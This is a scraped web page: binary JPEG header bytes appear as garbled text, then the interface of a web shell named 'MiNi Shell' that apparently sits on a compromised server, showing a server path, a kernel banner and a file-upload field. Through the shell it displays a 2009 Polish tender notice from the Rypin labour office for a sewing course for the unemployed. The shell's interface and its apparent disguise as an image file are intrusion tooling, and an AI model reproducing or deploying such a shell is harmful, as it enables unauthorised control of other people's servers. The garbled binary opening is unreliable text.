JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090824/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090824/138557-N-2009.html

<p class="kh_header"><b>Rypin: kurs dla bezrobotnych</b><br>
<b>Numer ogłoszenia: 138557 - 2009; data zamieszczenia: 24.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Nowy Rynek 14, 87-500 Rypin, woj. kujawsko-pomorskie, tel. 0-54 280-21-44, faks 0-54 280-24-79.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.rypin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> kurs dla bezrobotnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> kurs dla bezrobotnych - szwaczka 12 osób.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 40.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.   W postępowaniu może wziąć udział Wykonawca, który spełnia warunki określone w art. 22  ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych                          (Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.), tj.: 
1)	posiada  uprawnienia do wykonywania działalności z zakresu przedmiotu zamówienia,
2)   posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym 
i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3)   znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4)   nie podlega wykluczeniu z postępowania o udzielenie zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy, Zamawiający żąda następujących dokumentów: 

aktualny odpis z właściwego rejestru sądowego albo aktualne zaświadczenie                  o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
oświadczenie Wykonawcy, że spełnia warunki określone w art. 22 ust. 1 pkt. 1-3 Ustawy Prawo zamówień publicznych oraz że nie podlega wykluczeniu                                z postępowania na podstawie art. 24 ust. 1 i 2 Ustawy, zgodnie ze wzorem stanowiącym załącznik nr 2,
oświadczenie Wykonawcy, że nie zalega z opłaceniem podatków, opłat oraz  składek na ubezpieczenia społeczne i zdrowotne, zgodnie ze wzorem stanowiącym załącznik nr 3,

W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, Zamawiający żąda następujących dokumentów:
wykazu osób i podmiotów, którymi dysponuje wykonawca lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz                            z informacjami na temat ich wykształcenia, kwalifikacji zawodowych, doświadczenia zawodowego, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności (w postaci C.V., kserokopii świadectw, dyplomów, zaświadczeń itp., informacji o prowadzeniu szkoleń o tematyce będącej przedmiotem zamówienia w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia usługi - wskazać nazwę              i zakres tematyczny kursu oraz termin realizacji), 
oświadczenia Wykonawcy o zapewnieniu bazy zajęć teoretycznych i praktycznych do realizacji kursu, zgodnie ze wzorem stanowiącym załącznik nr 5,
wykazu niezbędnych do wykonania zamówienia narzędzi, urządzeń i sprzętu, którymi dysponuje lub będzie dysponował wykonawca; 
jeżeli wykonawca wskaże narzędzia, urządzenia i sprzęty, którymi będzie dysponował należy dołączyć pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi, urządzeń                i sprzętu (m.in. wskazać ilość i rodzaje maszyn szwalniczych wraz z opisem funkcji i przeznaczenia danej maszyny).
Zamawiający prosi o nie wymienianie sprzętu (wyposażenia), które nie ma związku z kursem będącym przedmiotem zamówienia i nie będzie wykorzystywany do jego realizacji, a znajduje się na wyposażeniu bazy lokalowej.


W celu potwierdzenia, że oferowane usługi odpowiadają wymaganiom określonym  przez Zamawiającego, Zamawiający żąda:
zaświadczenia o wpisie Wykonawcy do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę Wykonawcy (podstawa prawna: art. 20 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy - Dz. U. z 2008 r. Nr 69, poz. 415 z późn. zm.),
szczegółowego opisu bazy zajęć teoretycznych i zajęć praktycznych                                 z wyszczególnieniem ilości, rodzaju i typu sprzętu przeznaczonego do realizacji szkolenia (opisać te sale, w których faktycznie będą realizowane zajęcia i z których będą uczestnicy kursu rzeczywiście korzystać),
wykaz materiałów dydaktycznych (tkanin, nici, igieł itp.), których Wykonawca zamierza użyć do prawidłowej realizacji usługi organizacji i przeprowadzenia szkolenia będącego przedmiotem zamówienia (podać rodzaj i ilość dostosowaną do liczby uczestników szkolenia),                      
szczegółowego programu szkolenia, uwzględniającego wytyczne zawarte                          w rozdziale III pkt 6, tematykę i liczbę godzin określoną w niniejszej specyfikacji,
oświadczenia o ubezpieczeniu osób szkolonych, wskazanych przez Zamawiającego, od następstw nieszczęśliwych wypadków wraz z informacją                      o wysokości kosztu ubezpieczenia przypadającego na jedną osobę,
oświadczenia o współpracy wykładowców w ramach realizacji przedmiotu zamówienia,
wzoru zaświadczenia o ukończeniu kursu,
zatwierdzony przez Wykonawcę wzór umowy, stanowiący załącznik nr 4 do SIWZ.

Wykonawca do oferty musi załączyć również preliminarz kosztów szkolenia (koszt szkolenia ogółem, jednostkowy koszt szkolenia, koszt osobogodziny szkolenia), przy czym załączona kalkulacja ceny oferty powinna zawierać w osobnych pozycjach co najmniej:
koszt szkolenia,
koszty materiałów,
koszty eksploatacji, pomieszczeń i sprzętu,
koszty serwisu kawowego, 
ewentualne koszty dowozu uczestników z Rypina do miejsca realizacji szkolenia i z powrotem itp.
W preliminarzu kosztów szkolenia nie należy uwzględniać kosztów ubezpieczenia osób szkolonych.

Dokumenty składane są w oryginale lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę.
We wszelkich sprawach nie uregulowanych w niniejszej SIWZ mają zastosowanie przepisy ustawy z dnia 29.01.2004 r. - Prawo zamówień publicznych (Dz. U. z 2007 r. nr 223,                    poz. 1655 z późn. zm.). 

  Warunki dla Wykonawcy;
Wykonawca musi przedstawić program szkolenia zawierający w szczególności: 
nazwę i zakres szkolenia,
czas trwania i sposób organizacji szkolenia, 
wymagania wstępne dla uczestników szkolenia,
cele szkolenia,
ramowy program nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z wyodrębnieniem części teoretycznej i części praktycznej - szczegółowe bloki tematyczne oraz czasowy program realizacji szkolenia ze wskazaniem ilości godzin przeznaczonych na realizację poszczególnych zagadnień teoretycznych i praktycznych oraz wskazanie nazwiska wykładowcy, który będzie realizował dany zakres tematyczny,
treści szkolenia zgodne z wymaganymi zagadnieniami zawartymi w rozdziale III pkt 6 niniejszej specyfikacji,
wykazy literatury, środków i materiałów dydaktycznych,
sposób sprawdzenia efektów szkolenia.

Dostarczenie Zamawiającemu harmonogramu zajęć, uwzględniający: temat zajęć, treści szkolenia omawiane na zajęciach, godzinowy rozkład zajęć w danym dniu, nazwisko wykładowcy prowadzącego dane zajęcia, miejsce realizacji zajęć, w terminie 7 dni od rozstrzygnięcia postępowania, przy czym termin rozpoczęcia kursu musi być uprzednio zatwierdzony przez Zamawiającego.
Zapewnienie uczestnikom szkolenia warunków zgodnych z przepisami bezpieczeństwa i higieny pracy w trakcie trwania szkolenia.
Wskazanie dokładnego adresu miejsca realizacji szkolenia teoretycznego                  i praktycznego. 
Wykonawca musi zapewnić każdemu z uczestników swobodne wykonywanie ćwiczeń praktycznych - samodzielne stanowisko szkoleniowe dla każdego uczestnika wyposażone w maszynę szwalniczą (przeznaczoną do szycia). Ponadto w ramach praktyki wszyscy uczestnicy kursu powinni mieć możliwość praktycznego zapoznania się z różnymi rodzajami maszyn szwalniczych używanych obecnie w zakładach pracy takich jak np.: stebnówki, dwuigłówki, overlocki, renderki, dziurkarki, guzikarki, podszywarki, ryglówki bądź innych wskazanych przez Wykonawcę.
Wykonawca musi  zapewnić wszystkie niezbędne materiały szkoleniowe dla każdego  uczestnika szkolenia (tkaniny, guziki, suwaki, nici itp.), odzież ochronną oraz materiały piśmiennicze.
Powierzenie realizacji szkolenia wykładowcom posiadającym:
do prowadzenia zajęć teoretycznych - wykształcenie minimum średnie                      z zakresu branży włókienniczo-odzieżowej; 
do prowadzenia zajęć praktycznych - wykształcenie minimum zasadnicze zawodowe z zakresu branży odzieżowej (np. krawiec) oraz tytuł mistrza                    w zawodzie z zakresu branży odzieżowej (np. krawiec) lub minimum zasadnicze zawodowe oraz tytuł mistrza w zawodzie z zakresu branży odzieżowej                     (np. krawiec)
oraz do prowadzenia zajęć teoretycznych i praktycznych:
uprawnienia pedagogiczne lub ukończony kurs pedagogiczny dla instruktorów praktycznej nauki zawodu, 
     a także
doświadczenie zawodowe w wykonywaniu pracy związanej z przedmiotem zamówienia, tj. np. doświadczenie w dziedzinie realizacji szkoleń dotyczących przedmiotu zamówienia, praca na stanowisku kierownika lub brygadzisty w firmie, która ma w profilu swej działalności produkcję szwalniczą..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 50</li>
<li>2 - Baza lokalowa i wyposażenie w sprzęt i pomoce dydaktyczne - 20</li>
<li>3 - Doświadczenie w zakresie objętym przedmiotem zamówienia - 10</li>
<li>4 - Kwalifikacje kadry dydaktycznej - 10</li>
<li>5 - Program szkolenia - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pup.rypin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Rypinie
ul. Nowy Rynek 14, 87-500 Rypin.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.09.2009 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Rypinie
ul. Nowy Rynek 14, 87-500 Rypin , sekretariat pokój nr 4.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com